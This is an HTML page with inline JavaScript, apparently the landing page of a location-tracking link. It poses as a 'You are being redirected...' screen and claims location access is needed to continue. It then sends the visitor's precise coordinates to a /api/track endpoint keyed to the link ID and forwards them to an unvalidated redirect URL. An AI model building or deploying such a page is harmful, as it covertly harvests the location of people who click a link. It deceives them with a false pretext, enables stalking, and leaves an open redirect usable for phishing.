<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Please wait...</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #f8f9fa;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .loader {
            width: 40px;
            height: 40px;
            border: 5px solid #f3f3f3;
            border-top: 5px solid #007bff;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="card shadow-sm" style="max-width: 500px; width: 100%;">
            <div class="card-body text-center">
                <div id="loading">
                    <div class="loader mb-3"></div>
                    <h4>You are being redirected...</h4>
                    <p class="text-muted">Please allow location access to continue.</p>
                </div>
            </div>
        </div>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function () {
            // Get URL parameters
            const urlParams = new URLSearchParams(window.location.search);
            const linkId = urlParams.get('id');
            const redirectUrl = urlParams.get('redirect');

            if (!linkId) {
                window.location.href = '/';
                return;
            }

            function redirectToDestination() {
                if (redirectUrl) {
                    window.location.href = redirectUrl;
                } else {
                    window.location.href = '/';
                }
            }

            function requestLocation() {
                if (navigator.geolocation) {
                    navigator.geolocation.getCurrentPosition(
                        function (position) {
                            // Success callback
                            const locationData = {
                                latitude: position.coords.latitude,
                                longitude: position.coords.longitude
                            };

                            // Send location data to the server
                            fetch(`/api/track/${linkId}`, {
                                method: 'POST',
                                headers: {
                                    'Content-Type': 'application/json'
                                },
                                body: JSON.stringify(locationData)
                            })
                                .then(response => response.json())
                                .then(data => {
                                    // Redirect after successful tracking
                                    redirectToDestination();
                                })
                                .catch(error => {
                                    console.error('Error:', error);
                                    // Redirect anyway in case of error
                                    redirectToDestination();
                                });
                        },
                        function (error) {
                            // Error callback
                            console.error('Geolocation error:', error);
                            // Redirect anyway if user denies location
                            redirectToDestination();
                        },
                        {
                            enableHighAccuracy: true,
                            timeout: 5000,
                            maximumAge: 0
                        }
                    );
                } else {
                    // Geolocation not supported, redirect anyway
                    redirectToDestination();
                }
            }

            // Request location when page loads
            requestLocation();
        });
    </script>
</body>

</html>